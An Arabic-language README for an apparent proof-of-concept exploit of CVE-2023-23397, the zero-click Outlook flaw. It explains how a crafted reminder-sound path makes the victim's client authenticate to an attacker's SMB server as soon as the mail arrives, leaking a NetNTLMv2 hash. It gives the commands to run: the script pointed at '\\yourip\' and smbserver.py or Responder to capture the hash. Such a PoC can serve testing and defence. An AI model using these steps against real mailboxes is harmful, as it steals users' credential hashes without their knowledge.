
PoC بسيط لثغرة CVE-2023-23397 مع الحمولة المرسلة عبر البريد الإلكتروني.
PoC بسيط وسريع لثغرة CVE-2023-23397 التي تؤثر على عميل Outlook السميك.
يعاني Outlook من نقص في التحكم في إدخال المستخدم الذي يسمح بتكوين صوت تذكير الاجتماع والموعد. في الواقع، يتمكن المهاجم من إجبار الضحية على الاتصال بخادمه دون أي تلاعب من المستخدم (ثغرة بدون نقرة).
المهاجم الذي يستغل هذه الثغرة يسترجع ملخص NetNTLMv2 بناءً على كلمة مرور المستخدم المخدوع عبر طلب SMB. يتم تشغيل الطلب فور وصول البريد إلى صندوق الوارد.
.msg.في جلسة واحدة :
python CVE-2023-23397.py
usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path
python CVE-2023-23397.py --path '\\yourip\'
في جلسة ثانية (smbserver أو responder كما تريد).
smbserver.py -smb2support SHARE .
